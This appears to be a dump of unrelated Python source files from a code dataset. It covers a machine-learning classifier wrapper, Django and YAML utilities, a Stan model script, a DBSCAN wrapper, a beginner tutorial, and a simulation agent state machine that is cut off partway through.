        """Train the classifier on (X, y) via the Frovedis server; returns cls."""
        # compute number of classes in given label vector (y)
        # (set-based: O(n) instead of the old O(n^2) list membership scan)
        cls.n_classes_ = len(set(y))
        # validate hyper-parameters
        cls.validate()
        # release old model, if any
        cls.release()
        # perform the fit
        cls.__mid = ModelID.get()
        inp_data = FrovedisLabeledPoint(X,y)
        (X, y) = inp_data.get()
        dtype = inp_data.get_dtype()
        itype = inp_data.get_itype()
        dense = inp_data.is_dense()
        cls.__mdtype = dtype
        (host,port) = FrovedisServer.getServerInstance()
        rpclib.dt_train(host,port,X.get(),y.get(),
                    cls.algo.encode('ascii'), cls.criterion.encode('ascii'),
                    cls.max_depth, cls.n_classes_, cls.max_bins, cls.min_samples_leaf,
                    cls.min_info_gain, cls.verbose, cls.__mid,
                    dtype, itype, dense)
        excpt = rpclib.check_server_exception()
        if excpt["status"]: raise RuntimeError(excpt["info"])
        return cls
    # Perform classification on an array of test vectors X.
    def predict(cls,X):
        """Return predicted class labels for X."""
        if cls.__mid is not None:
            return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,False)
        else:
            raise ValueError("predict is called before calling fit, or the model is released.")
    # Perform classification on an array and return probability estimates for the test vector X.
    def predict_proba(cls,X):
        """Return class probability estimates for X."""
        if cls.__mid is not None:
            return GLM.predict(X,cls.__mid,cls.__mkind,cls.__mdtype,True)
        else:
            raise ValueError("predict is called before calling fit, or the model is released.")
    # Load the model from a file
    def load(cls,fname,dtype=None):
        """Restore a saved model from *fname*; dtype is required on first load."""
        cls.release()
        cls.__mid = ModelID.get()
        if dtype is None:
            if cls.__mdtype is None:
                raise TypeError("model type should be specified for loading from file!")
        else: cls.__mdtype = TypeUtil.to_id_dtype(dtype)
        GLM.load(cls.__mid,cls.__mkind,cls.__mdtype,fname)
        return cls
    # calculate the mean accuracy on the given test data and labels.
    def score(cls,X,y):
        """Return mean accuracy on (X, y); raises when the model is not fitted."""
        if cls.__mid is None:
            # consistent with predict(): fail loudly instead of returning None
            raise ValueError("score is called before calling fit, or the model is released.")
        return accuracy_score(y, cls.predict(X))
    # Save model to a file
    def save(cls,fname):
        """Persist the trained model to *fname* (no-op when not fitted)."""
        if cls.__mid is not None: GLM.save(cls.__mid,cls.__mkind,cls.__mdtype,fname)
    # Show the model
    def debug_print(cls):
        """Dump the server-side model structure (debugging aid)."""
        if cls.__mid is not None: GLM.debug_print(cls.__mid,cls.__mkind,cls.__mdtype)
    # Release the model-id to generate new model-id
    def release(cls):
        """Free the server-side model and reset the model id."""
        if cls.__mid is not None:
            GLM.release(cls.__mid,cls.__mkind,cls.__mdtype)
            cls.__mid = None
    # Check FrovedisServer is up then release
    def __del__(cls):
        # only release when the server is still alive
        if FrovedisServer.isUP(): cls.release()
| StarcoderdataPython |
4830474 | <gh_stars>0
"""django_workflow_engine utils."""
import sys
import importlib
from django.conf import settings
from .exceptions import WorkflowImproperlyConfigured
def build_workflow_choices(workflows):
    """Build workflow choices.

    Fixed docstring: the parameter is a mapping, not a list of paths, and
    only its keys are used (each key is resolved via load_workflow, which
    reads settings.DJANGO_WORKFLOWS).

    :param (dict) workflows: Mapping of display name to workflow class or
        dotted path, e.g. {'Onboard': 'workflows.onboard.OnboardContractor'}.
        Keys must also be keys of settings.DJANGO_WORKFLOWS.
    :returns (list[Tuple]): List of tuples (workflow class name, display name)
    """
    return [
        (load_workflow(display_name).name, display_name)
        for display_name in workflows
    ]
def lookup_workflow(workflow_name):
    """Look up workflow class.

    Given the configured workflows and a workflow name, returns the associated
    workflow class.

    :param (str) workflow_name: Workflow name (a key of settings.DJANGO_WORKFLOWS).
    :returns (class): The requested workflow class.
    :raises (WorkflowImproperlyConfigured): If workflow not found.
    """
    for display_name in settings.DJANGO_WORKFLOWS:
        if display_name == workflow_name:
            return load_workflow(display_name)
    # Bug fix: report the name that was requested. The old code used the
    # loop variable, which named the *last* configured workflow — and raised
    # NameError when DJANGO_WORKFLOWS was empty.
    raise WorkflowImproperlyConfigured(f"Cannot find workflow: {workflow_name}")
def load_workflow(workflow_key):
    """Load a workflow class.

    Resolves settings.DJANGO_WORKFLOWS[workflow_key]. The configured value
    may already be a class (returned as-is) or a string: either a dotted
    module path ending in a class name, or a bare name looked up in this
    module.

    :param (str) workflow_key: Key into settings.DJANGO_WORKFLOWS.
    :returns (class): The workflow class.
    :raises (WorkflowImproperlyConfigured): If the import or lookup fails.
    """
    target = settings.DJANGO_WORKFLOWS[workflow_key]
    if type(target) is not str:
        # Already a class object; nothing to import.
        return target
    try:
        if "." not in target:
            return getattr(sys.modules[__name__], target)
        module_path, cls = target.rsplit(".", 1)
        return getattr(importlib.import_module(module_path), cls)
    except (ModuleNotFoundError, ImportError, AttributeError) as e:
        raise WorkflowImproperlyConfigured(
            f"Failed to load workflow from '{target}': {e}"
        )
| StarcoderdataPython |
3284463 | <reponame>pnarvor/nephelae_base<filename>nephelae_scenario/utils.py
# This defines a collection of function to help parsing of yaml configuration
def ensure_dictionary(config):
    """
    ensure_dictionary

    Ensure that config is a dictionary. If not, it is probably a list of
    one-element dictionaries (the writer of the configuration file put
    hyphens '-' in front of the keys); in that case, fuse all list elements
    into a single dictionary and return it.

    This keeps parsing code simple: the result is always a dictionary.
    """
    if isinstance(config, dict):
        return config
    if not isinstance(config, list):
        raise TypeError("Unforeseen error in configuration file.\n" +
                        str(config))
    merged = {}
    for item in config:
        # each list element must be a single-key dictionary
        if not isinstance(item, dict) or len(item) != 1:
            raise ValueError("Parsing error in the configuration file.\n" +
                             str(item))
        key, value = next(iter(item.items()))
        if key in merged:
            raise ValueError("Parsing error in the configuration file."+
                             "Two elements have the same key : " + str(key))
        merged[key] = value
    return merged
def ensure_list(config):
    """
    ensure_list

    Ensure that config is a list of strings and one-valued dictionaries.
    This is called when the order of elements matters when loading the
    config file (the yaml elements MUST carry hyphens '-').

    Returns config unchanged when valid. This mirrors ensure_dictionary's
    interface and leaves room for future config-file repairs without
    breaking the API.
    """
    if not isinstance(config, list):
        raise TypeError("config is not a list. Did you forget some '-' "+
                        "in your configuration file ?\n" + str(config))
    for item in config:
        if isinstance(item, str):
            continue
        # non-string elements must be single-key dictionaries
        if not isinstance(item, dict) or len(item) != 1:
            raise ValueError("Parsing error in the configuration file.\n" +
                             str(item))
    return config
def find_aircraft_id(key, config):
    """
    find_aircraft_id

    The aircraft identifier can be given either under the 'identifier' or
    'id' field of the aircraft configuration item, or as the dictionary key
    in the yaml file. 'identifier' wins over 'id', which wins over the key.
    The result is always returned as a string.
    """
    for field in ('identifier', 'id'):
        if field in config.keys():
            return str(config[field])
    return str(key)
| StarcoderdataPython |
1659439 | <filename>src/permaviss/gauss_mod_p/__init__.py
""" __init__.py
This module implements the Gaussian elimination of a matrix by column
reductions. Coefficients are assumed to lie on a finite field Z (mod p) Where
p is a prime and Z are the integers. Ideally, this should be implemented in
Cython or similar later on.
"""
| StarcoderdataPython |
3780 | #!/home/a.ghaderi/.conda/envs/envjm/bin/python
# Model 2
import pystan
import pandas as pd
import numpy as np
import sys
sys.path.append('../../')
import utils
parts = 1  # participant id to fit
data = utils.get_data() #loading dataset
data = data[data['participant']==parts]
# Split trials by N200-latency plausibility window (.101 s, .248 s):
# out-of-window latencies are treated as missing and imputed by the model.
# NOTE(review): trials exactly at .101 or .248 match neither mask — confirm
# the boundaries are meant to be exclusive on both sides.
mis = np.where((data['n200lat']<.101)|(data['n200lat']>.248))[0] # missing data for n200lat
obs = np.where((data['n200lat']>.101)&(data['n200lat']<.248))[0] # observed data for n200lat
N_mis = mis.shape[0] # number of missing data
N_obs = obs.shape[0] # number of observed data
modelfile = '../../stans/res_nonhier.stan' #reading the model stan
# NOTE(review): the file handle is never closed; a with-block would be safer.
f = open(modelfile, 'r')
model_wiener = f.read()
sm = pystan.StanModel(model_code=model_wiener)# Compile the model stan
ncohers = 2 #Number of coherence conditions
nspats = 2 #Number of spatial conditions
nconds = 4 #Number of conditions
y = data['y'].to_numpy()
cond_coher = data['cond_coher'].to_numpy()
cond_spat = data['cond_spat'].to_numpy()
conds = data['conds'].to_numpy()
n200lat = data['n200lat'].to_numpy()
#set initial data for model stan; observed trials first, missing trials last
data_winner = {'N_obs':N_obs, #Number of trial-level observations
               'N_mis':N_mis, #Number of trial-level missing data
               'ncohers':ncohers, #Number of coherence conditions
               'nspats':nspats, #Number of spatial conditions
               'nconds':nconds, #Number of conditions
               'y':np.concatenate([y[obs],y[mis]]), #acc*rt in seconds for observed and missing data
               'cond_coher':np.concatenate([cond_coher[obs],cond_coher[mis]]), #Coherence index for each trial
               'cond_spat':np.concatenate([cond_spat[obs],cond_spat[mis]]), #spatial index for each trial
               'conds':np.concatenate([conds[obs],conds[mis]]), #condition index for each trial
               'n200lat_obs':n200lat[obs]}; #n200 latency for each trial observation
# setting MCMC arguments
niter = 10000
nwarmup = 4000
nchains = 1
thin = 1
initials = [] # initial sampling: one dict of start values per chain
for c in range(0, nchains):
    chaininit = {
        'delta': np.random.uniform(1, 3, size=ncohers),
        'alpha': np.random.uniform(.5, 1.),
        'eta': np.random.uniform(.01, .2),
        'res': np.random.uniform(.01, .02, size=nspats),
        'n200sub': np.random.uniform(.11, .2, size=nconds),
        'lambda': np.random.uniform(.01, .02),
        'n200lat_mis': np.random.uniform(.11, .2, size = N_mis)
    }
    initials.append(chaininit)
# Train the model and generate samples
fit = sm.sampling(data=data_winner, iter=niter, chains=nchains, warmup=nwarmup, thin=thin, init=initials)
utils.to_pickle(stan_model=sm, stan_fit=fit, save_path='../../save/nonhier/'+str(parts)+'_res_nonhier.pkl')
| StarcoderdataPython |
1752203 | from lithopscloud.modules.gen2.image import ImageConfig
class RayImageConfig(ImageConfig):
    """Image configuration for Ray clusters: writes the chosen VM image and
    boot volume size into every node type of the Ray cluster config."""
    def update_config(self, image_id, minimum_provisioned_size):
        """Set image_id and boot_volume_capacity on all available node types.

        minimum_provisioned_size will be used once a non-default image is
        used. Falls back to the 'ray_head_default' node type when no node
        types are present in the base config.
        """
        node_types = self.base_config.get('available_node_types')
        if node_types:
            targets = node_types.values()
        else:
            # preserves original behaviour: KeyError if the default head
            # node type (or the whole section) is missing from the config
            targets = [self.base_config['available_node_types']['ray_head_default']]
        # single assignment loop replaces the duplicated branch bodies
        for node in targets:
            node['node_config']['image_id'] = image_id
            node['node_config']['boot_volume_capacity'] = minimum_provisioned_size
| StarcoderdataPython |
5036 | <reponame>grigi/pybbm
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
    """Ensures every authenticated user has a pybb profile and activates
    the language stored on that profile for the current request."""
    def process_request(self, request):
        # Runs for every request; anonymous users are left untouched.
        if request.user.is_authenticated():
            try:
                # Here we try to load profile, but can get error
                # if user created during syncdb but profile model
                # under south control. (Like pybb.Profile).
                profile = util.get_pybb_profile(request.user)
            except ObjectDoesNotExist:
                # Ok, we should create new profile for this user
                # and grant permissions for add posts
                user_saved(request.user, created=True)
                profile = util.get_pybb_profile(request.user)
            language = translation.get_language_from_request(request)
            # No stored preference yet: remember the request's language.
            if not profile.language:
                profile.language = language
                profile.save()
            # A stored preference wins over the request language: persist it
            # in the session and switch translation for this request.
            if profile.language and profile.language != language:
                request.session['django_language'] = profile.language
                translation.activate(profile.language)
                request.LANGUAGE_CODE = translation.get_language()
| StarcoderdataPython |
117095 | <reponame>dicryptor/MSAS
import numpy as np
import time
import ResponsiveValue
import random
ALPHA = 0.5                 # filter coefficient: higher tracks faster
deg_sym = u'\u00b0'         # degree symbol for console output

def low_pass_test(input_list, output_list=None):
    """One step of an exponential low-pass filter over a 3-channel sample.

    Returns input_list unchanged when there is no previous output,
    otherwise a new 3-element list blended toward the input by ALPHA.
    """
    if not output_list:
        return input_list
    # Fixed: compute the result locally. The original wrote into the
    # module-level `output` list, coupling the function to global state.
    return [output_list[i] + ALPHA * (input_list[i] - output_list[i])
            for i in range(3)]
def low_pass_filter(self, input, output=None):
    # NOTE(review): takes `self` and reads self.ALPHA, so this looks like a
    # method pasted at module level; it is never called in this script.
    # It also shadows the builtin `input`. Confirm intent before reuse.
    if not output: return input
    # blend the previous output toward the new input by self.ALPHA
    output_filtered = output + self.ALPHA * (input - output)
    return output_filtered
# // affects the curve of movement amount > snap amount
# // smaller amounts like 0.001 make it ease slower
# // larger amounts like 0.1 make it less smooth
SNAP_MULTIPLIER = 0.007

def dynamicFilter(val, smoothVal=None):
    """One step of ResponsiveAnalogRead-style adaptive smoothing.

    Large jumps snap quickly toward the new value; small jitter is eased
    slowly. Returns the new smoothed value.
    """
    if smoothVal is None:
        smoothVal = 0
    diff = val - smoothVal
    # Bug fix: the snap amount scales with the *magnitude* of the change,
    # snapCurve(abs(diff) * SNAP_MULTIPLIER), per the ResponsiveAnalogRead
    # algorithm. The old `diff - SNAP_MULTIPLIER` fed signed offsets into
    # snapCurve, which blows up as diff approaches -1.
    snap = snapCurve(abs(diff) * SNAP_MULTIPLIER)
    smoothVal += (val - smoothVal) * snap
    return smoothVal

def snapCurve(x):
    """Map x >= 0 to a snap factor in [0, 1]: fast growth, then saturation."""
    y = 1 / (x + 1)
    y = (1 - y) * 2
    if y > 1:
        return 1
    return y
# print(sample_input)
# Demo loop: generates random 3-channel samples and a random scalar, feeds
# them through ResponsiveValue, dynamicFilter and low_pass_test, and prints
# the results twice a second. Runs forever (Ctrl-C to stop).
output = None          # last low-pass output (3-element list)
responsiveVal = None   # last dynamicFilter output
while True:
    sample_input = np.random.uniform(low=0.0, high=10.0, size=(3,))
    input_list = sample_input.tolist()
    sample_val = random.uniform(0.1, 2.5)
    # NOTE(review): a fresh ResponsiveValue is built every iteration, so its
    # internal smoothing history never accumulates — confirm this is intended.
    responsive_value = ResponsiveValue.ResponsiveValue()
    responsive_value.update(sample_val)
    print('New Value: {}\t{}\t{}\t{}\t{}\t{}'.format(
        sample_val,
        responsive_value.has_changed,
        responsive_value.raw_value,
        responsive_value.responsive_value,  # the smoothed out value
        responsive_value.sleeping,
        responsive_value._error_EMA))
    # seed the adaptive filter on the first pass, then feed back its output
    if responsiveVal == None:
        responsiveVal = dynamicFilter(sample_val)
    else:
        responsiveVal = dynamicFilter(sample_val, responsiveVal)
    # print("Before filter: {} After filter: {}".format(sample_val, responsiveVal))
    # same first-pass seeding for the 3-channel low-pass filter
    if output == None:
        output = low_pass_test(input_list)
    else:
        output = low_pass_test(input_list, output)
    # print("Input vals: {:>1.6f} {:>1.6f} {:>1.6f} | Output vals: {:>1.6f} {:>1.6f} {:>1.6f} {}".format(*input_list,
    #                                                                                                    *output,
    #                                                                                                    deg_sym))
    time.sleep(0.5)
| StarcoderdataPython |
3370947 | <reponame>MaXiaoran/FakeZillow
"""
Testing Flask installation
"""
from werkzeug.routing import BaseConverter
from flask import Flask,render_template,request
class RegexConvert(BaseConverter):
    """Werkzeug URL converter whose matching pattern is supplied as the
    first converter argument in the route rule."""
    def __init__(self, url_map, *itms):
        super(RegexConvert, self).__init__(url_map)
        # the first converter argument becomes the URL-matching regex
        self.regex = itms[0]
app = Flask(__name__)

@app.route('/')
def hello():
    """Render the landing page."""
    page_context = {'title': 'Welcome'}
    return render_template('index.html', **page_context)
@app.route('/services')
def services():
    # Placeholder page: returns a bare string until a template exists.
    return 'services'
@app.route('/login')
def login():
    """Render the login page, exposing the HTTP method that requested it."""
    http_method = request.method
    return render_template('login.html', method=http_method)
if __name__ == '__main__':
    # Development server only; use a production WSGI server (and debug=False)
    # when deploying.
    app.run(debug=True)
| StarcoderdataPython |
3378698 | <reponame>toolkmit/algotrading
from .cnn import cnn | StarcoderdataPython |
3214941 | #
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#******************************************************************************/
import numpy as np
import warnings
from scipy import sparse
from sklearn.utils import (check_array, check_consistent_length)
from sklearn.cluster import DBSCAN as DBSCAN_original
import daal4py
from daal4py.sklearn._utils import (make2d, getFPType)
def _daal_dbscan(X, eps=0.5, min_samples=5, sample_weight=None):
    """Run DBSCAN on the Intel(R) DAAL (daal4py) backend.

    Parameters mirror scikit-learn's DBSCAN. X is validated and converted
    to float64/float32; sample_weight, if given, must match X's length.

    Returns
    -------
    (core_ind, assignments) : tuple of 1-D arrays
        Indices of the core samples, and the cluster label of every sample
        (-1 for noise).
    """
    if not eps > 0.0:
        raise ValueError("eps must be positive.")
    X = check_array(X, dtype=[np.float64, np.float32])
    if sample_weight is not None:
        sample_weight = np.asarray(sample_weight)
        check_consistent_length(X, sample_weight)
        ww = make2d(sample_weight)
    else:
        ww = None
    XX = make2d(X)
    # removed dead locals: fpt (getFPType result) and n_clusters were
    # computed but never used
    alg = daal4py.dbscan(
        method='defaultDense',
        epsilon=float(eps),
        minObservations=int(min_samples),
        resultsToCompute="computeCoreIndices")
    daal_res = alg.compute(XX, ww)
    assignments = daal_res.assignments.ravel()
    if daal_res.coreIndices is not None:
        core_ind = daal_res.coreIndices.ravel()
    else:
        # no core samples found at all
        core_ind = np.array([], dtype=np.intc)
    return (core_ind, assignments)
class DBSCAN(DBSCAN_original):
    """Perform DBSCAN clustering from vector array or distance matrix.
    DBSCAN - Density-Based Spatial Clustering of Applications with Noise.
    Finds core samples of high density and expands clusters from them.
    Good for data which contains clusters of similar density.
    Read more in the :ref:`User Guide <dbscan>`.
    Parameters
    ----------
    eps : float, optional
        The maximum distance between two samples for one to be considered
        as in the neighborhood of the other. This is not a maximum bound
        on the distances of points within a cluster. This is the most
        important DBSCAN parameter to choose appropriately for your data set
        and distance function.
    min_samples : int, optional
        The number of samples (or total weight) in a neighborhood for a point
        to be considered as a core point. This includes the point itself.
    metric : string, or callable
        The metric to use when calculating distance between instances in a
        feature array. If metric is a string or callable, it must be one of
        the options allowed by :func:`sklearn.metrics.pairwise_distances` for
        its metric parameter.
        If metric is "precomputed", X is assumed to be a distance matrix and
        must be square. X may be a :term:`Glossary <sparse graph>`, in which
        case only "nonzero" elements may be considered neighbors for DBSCAN.
        .. versionadded:: 0.17
           metric *precomputed* to accept precomputed sparse matrix.
    metric_params : dict, optional
        Additional keyword arguments for the metric function.
        .. versionadded:: 0.19
    algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute', 'daal'}, optional
        The algorithm to be used by the NearestNeighbors module
        to compute pointwise distances and find nearest neighbors.
        See NearestNeighbors module documentation for details.
        If algorithm is set to 'daal', Intel(R) DAAL will be used.
    leaf_size : int, optional (default = 30)
        Leaf size passed to BallTree or cKDTree. This can affect the speed
        of the construction and query, as well as the memory required
        to store the tree. The optimal value depends
        on the nature of the problem.
    p : float, optional
        The power of the Minkowski metric to be used to calculate distance
        between points.
    n_jobs : int or None, optional (default=None)
        The number of parallel jobs to run.
        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.
    Attributes
    ----------
    core_sample_indices_ : array, shape = [n_core_samples]
        Indices of core samples.
    components_ : array, shape = [n_core_samples, n_features]
        Copy of each core sample found by training.
    labels_ : array, shape = [n_samples]
        Cluster labels for each point in the dataset given to fit().
        Noisy samples are given the label -1.
    Examples
    --------
    >>> from sklearn.cluster import DBSCAN
    >>> import numpy as np
    >>> X = np.array([[1, 2], [2, 2], [2, 3],
    ...               [8, 7], [8, 8], [25, 80]])
    >>> clustering = DBSCAN(eps=3, min_samples=2).fit(X)
    >>> clustering.labels_
    array([ 0,  0,  0,  1,  1, -1])
    >>> clustering
    DBSCAN(eps=3, min_samples=2)
    See also
    --------
    OPTICS
        A similar clustering at multiple values of eps. Our implementation
        is optimized for memory usage.
    Notes
    -----
    For an example, see :ref:`examples/cluster/plot_dbscan.py
    <sphx_glr_auto_examples_cluster_plot_dbscan.py>`.
    This implementation bulk-computes all neighborhood queries, which increases
    the memory complexity to O(n.d) where d is the average number of neighbors,
    while original DBSCAN had memory complexity O(n). It may attract a higher
    memory complexity when querying these nearest neighborhoods, depending
    on the ``algorithm``.
    One way to avoid the query complexity is to pre-compute sparse
    neighborhoods in chunks using
    :func:`NearestNeighbors.radius_neighbors_graph
    <sklearn.neighbors.NearestNeighbors.radius_neighbors_graph>` with
    ``mode='distance'``, then using ``metric='precomputed'`` here.
    Another way to reduce memory and computation time is to remove
    (near-)duplicate points and use ``sample_weight`` instead.
    :class:`cluster.OPTICS` provides a similar clustering with lower memory
    usage.
    References
    ----------
    <NAME>., <NAME>, <NAME>, and <NAME>, "A Density-Based
    Algorithm for Discovering Clusters in Large Spatial Databases with Noise".
    In: Proceedings of the 2nd International Conference on Knowledge Discovery
    and Data Mining, Portland, OR, AAAI Press, pp. 226-231. 1996
    <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017).
    DBSCAN revisited, revisited: why and how you should (still) use DBSCAN.
    ACM Transactions on Database Systems (TODS), 42(3), 19.
    """
    def __init__(self, eps=0.5, min_samples=5, metric='euclidean',
                 metric_params=None, algorithm='auto', leaf_size=30, p=None,
                 n_jobs=None):
        # Plain parameter storage, as required by the sklearn estimator API.
        self.eps = eps
        self.min_samples = min_samples
        self.metric = metric
        self.metric_params = metric_params
        self.algorithm = algorithm
        self.leaf_size = leaf_size
        self.p = p
        self.n_jobs = n_jobs
    def fit(self, X, y=None, sample_weight=None):
        """Perform DBSCAN clustering from features, or distance matrix.
        Parameters
        ----------
        X : array-like or sparse matrix, shape (n_samples, n_features), or \
            (n_samples, n_samples)
            Training instances to cluster, or distances between instances if
            ``metric='precomputed'``. If a sparse matrix is provided, it will
            be converted into a sparse ``csr_matrix``.
        sample_weight : array, shape (n_samples,), optional
            Weight of each sample, such that a sample with a weight of at least
            ``min_samples`` is by itself a core sample; a sample with a
            negative weight may inhibit its eps-neighbor from being core.
            Note that weights are absolute, and default to 1.
        y : Ignored
            Not used, present here for API consistency by convention.
        Returns
        -------
        self
        """
        X = check_array(X, accept_sparse='csr')
        if not self.eps > 0.0:
            raise ValueError("eps must be positive.")
        if sample_weight is not None:
            sample_weight = np.asarray(sample_weight)
            check_consistent_length(X, sample_weight)
        # Offload to Intel(R) DAAL only for the cases it supports: a dense
        # float ndarray, euclidean (or minkowski with p=2) metric, and an
        # 'auto'/'brute' algorithm choice. Everything else falls back to
        # stock scikit-learn below.
        # NOTE(review): algorithm='daal' (mentioned in the class docstring)
        # is not matched by this check and falls through to sklearn — confirm.
        _daal_ready = ((self.algorithm in ['auto', 'brute']) and
                      (self.metric == 'euclidean' or
                      (self.metric == 'minkowski' and self.p == 2)) and
                      isinstance(X, np.ndarray) and (X.dtype.kind in ['d', 'f']))
        if _daal_ready:
            core_ind, assignments = _daal_dbscan(
                X, self.eps,
                self.min_samples,
                sample_weight=sample_weight)
            self.core_sample_indices_ = core_ind
            self.labels_ = assignments
            # components_ holds the coordinates of the core samples
            self.components_ = np.take(X, core_ind, axis=0)
            return self
        else:
            return super().fit(X, y, sample_weight=sample_weight)
| StarcoderdataPython |
4814735 | print()
# ----------------------------
print('# ')
def draw_box(height, width):
    """Print a filled rectangle of '*' characters: height rows, width columns."""
    for _ in range(height):
        print('*' * width)
draw_box(10, 100)
print()
# ----------------------------
# (prints: "rectangles of different sizes")
print('# прямоугольники разных размеров:')
draw_box(3, 3)
print()
draw_box(5, 5)
print()
draw_box(4, 10)
print()
# ----------------------------
# (prints: "parameters are variables")
print('# параметры - переменные')
n = 3
m = 9
draw_box(n, m)
print()
# ----------------------------
# (prints: "parameters are variables 02")
print('# параметры - переменные 02:')
def print_hello(n):
    """Print 'Hello' repeated n times on a single line."""
    print('Hello' * n)
print_hello(3)
print_hello(5)
# an argument can also be passed via a variable
times = 2
print_hello(times)
print()
# ----------------------------
# (prints: "function: two parameters")
print('# функция: два параметра')
def print_text(txt, n):
    """Print txt repeated n times on a single line."""
    print(txt * n)
print_text('Hello', 5)
print_text('A', 10)
print()
# ----------------------------
# (prints: "functions: arguments, parameters")
print('# функции: аргументы. параметры')
def draw_box(height, width):
    """Print a height x width rectangle of asterisks (redefines draw_box)."""
    row = '*' * width
    for _ in range(height):
        print(row)
# The parameters are the variables height and width.
# At the moment of the call draw_box(height, width):
# the arguments are height and 9.
height = 10
draw_box(height, 9)
print()
# ----------------------------
# (prints: "functions: modifying variables")
print('# функции: внесение изменений в переменные.')
def draw_box(height, width):
    """Demo of parameter locality: the arguments are immediately overwritten,
    so this always prints a 2 x 10 box regardless of what is passed in."""
    height = 2
    width = 10
    for _ in range(height):
        print('*' * width)
n = 5
m = 7
draw_box(n, m)
# the caller's variables are unchanged by the reassignments inside draw_box
print(n, m)
print()
# ----------------------------
print('# ')
print()
# ----------------------------
print('# ')
print()
| StarcoderdataPython |
12737 | import transitions
from functools import partial
# from transitions import transitions.Machine
# TODO: whenever there is a state chage store the following
# (DAY,function_called) -> Stored for every person for agent status, state and Testing state
class AgentStatusA(object):
    """The Statemachine of the agent"""
    # Mobility states; index order matters throughout the methods below.
    status = ['Free','Quarentined','Out_of_city','Hospitalized','ICU','Isolation']
    def __init__(self):
        """Agent Status class is responsible for figuring out the Mobility of the agent, the agent mobility can be
        'Free','Quarentined','Out_of_city','Hospitalized','ICU','Isolation'
        """
        super(AgentStatusA, self).__init__()
        self.ADDED_BIT = True               # True while counted in workplace/transport sets
        self.TruthStatus = None             # placeholder-tracking object (set via update_objects)
        self.Last_Added_Placeholder = None  # code of the TruthStatus set this agent sits in
        self.buffer = []                    # audit trail of _add_/_remove_ calls
        self.Status = self.status[0]
    # def log_update(self,message):
    def update_objects(self,TruthStatus):
        """Update object of Virusmodel

        Args:
            TruthStatus (object): Truth State object to update
        """
        self.TruthStatus = TruthStatus
    def __remove_from_transport__(self):
        # Drop from the city's travelling list when using the transport network.
        # NOTE(review): useTN and City are set elsewhere on the person — confirm.
        if self.useTN == True:
            self.City.TravellingCitizens.remove(self)
            #print('Person {} removed from travelling list of City {}. New length = {}'.format(self.IntID, self.City.Name, len(self.City.TravellingCitizens)))
    def _remove_(self):
        """Remove from workplace and transport list
        """
        if self.ADDED_BIT:
            obj = self.get_workplace_obj()
            if obj !=None:
                self.buffer.append('_remove_')
                obj.Working.remove(self)
            self.ADDED_BIT = False
            self.__remove_from_transport__()
    def _add_(self):
        """Add to workplace and transport list
        """
        # Bug fix: the guard used `~self.ADDED_BIT` (bitwise NOT), which is
        # truthy for both True (-2) and False (-1), so the body always ran
        # and '_add_' was logged repeatedly. `not` expresses the intent.
        if not self.ADDED_BIT:
            obj = self.get_workplace_obj()
            if obj != None:
                if obj.Working!=None:
                    self.buffer.append('_add_')
                    obj.Working.add(self)
                    self.ADDED_BIT = True
            if self.useTN == True:
                self.City.TravellingCitizens.add(self)
    def _left_(self):
        """Leave city, calls remove
        """
        self._remove_()
    def _entered_(self):
        """Come back to city
        """
        self._add_()
    def __remove_from_placeholder__(self):
        """Remove the person from the Truth Status Placeholders

        Placeholder codes: 0 AFreeP, 1 AQuarentinedP, 2 SIsolatedP,
        3 SHospitalizedP, 4 SIcuP.

        Returns:
            bool: Whether Removed or not
        """
        try:
            if self.Last_Added_Placeholder == 0: # If he is AFreeP
                self.TruthStatus.AFreeP.remove(self)
                return True
            elif self.Last_Added_Placeholder == 1: # If he was Quarentined
                self.TruthStatus.AQuarentinedP.remove(self)
                return True
            elif self.Last_Added_Placeholder == 2: # If he was Isolated
                self.TruthStatus.SIsolatedP.remove(self)
                return True
            elif self.Last_Added_Placeholder == 3: # If he was Hospitalized
                self.TruthStatus.SHospitalizedP.remove(self)
                return True
            elif self.Last_Added_Placeholder == 4: # If he was Icu
                self.TruthStatus.SIcuP.remove(self)
                return True
            else:
                return False
        except:
            # NOTE(review): bare except re-raises after dumping state;
            # 'except Exception' would be safer against KeyboardInterrupt.
            self.about()
            raise
    def leave_city(self):
        # Free -> Out_of_city; also leaves workplace/transport and placeholders.
        acceptable_states = [self.status[0]]
        try:
            assert self.Status in acceptable_states
        except:
            print('##########', self.Status)
            raise
        self.Status = self.status[2]
        self._left_()
        self.__remove_from_placeholder__()
        self.Last_Added_Placeholder = None
    def enter_city(self):
        # Out_of_city -> Free; asymptomatic returnees rejoin the free pool.
        # NOTE(review): is_Asymptomatic is defined on the AgentStateA subclass.
        acceptable_states = [self.status[2]]
        try:
            assert self.Status in acceptable_states
        except:
            print('##########', self.Status)
            raise
        self.Status = self.status[0]
        self._entered_()
        if self.is_Asymptomatic():
            self.TruthStatus.AFreeP.add(self)
            self.Last_Added_Placeholder = 0
    def quarentined(self,DAY):
        # Free/Quarentined/Out_of_city -> Quarentined. DAY is unused but kept
        # for interface symmetry with the other transition methods.
        acceptable_states = [self.status[0],self.status[1],self.status[2]]
        assert self.Status in acceptable_states
        if self.Last_Added_Placeholder != 1:
            self.__remove_from_placeholder__()
            if self.is_Free(): # If free add to quarentined placeholders
                self.TruthStatus.AQuarentinedP.add(self)
                self.Last_Added_Placeholder = 1
        self.Status = self.status[1]
        self._remove_()
    def hospitalized(self,DAY):
        acceptable_states = [self.status[0],self.status[1]]
        assert self.Status in acceptable_states
        self.Status = self.status[3]
        self._remove_()
        self.show_symptoms(DAY)
        if self.__remove_from_placeholder__(): #If person is in city and removal is successful
            self.TruthStatus.SHospitalizedP.add(self)
            self.Last_Added_Placeholder = 3
    def admit_icu(self,DAY):
        acceptable_states = [self.status[0],self.status[1],self.status[3]]
        assert self.Status in acceptable_states
        self.Status = self.status[4]
        self._remove_()
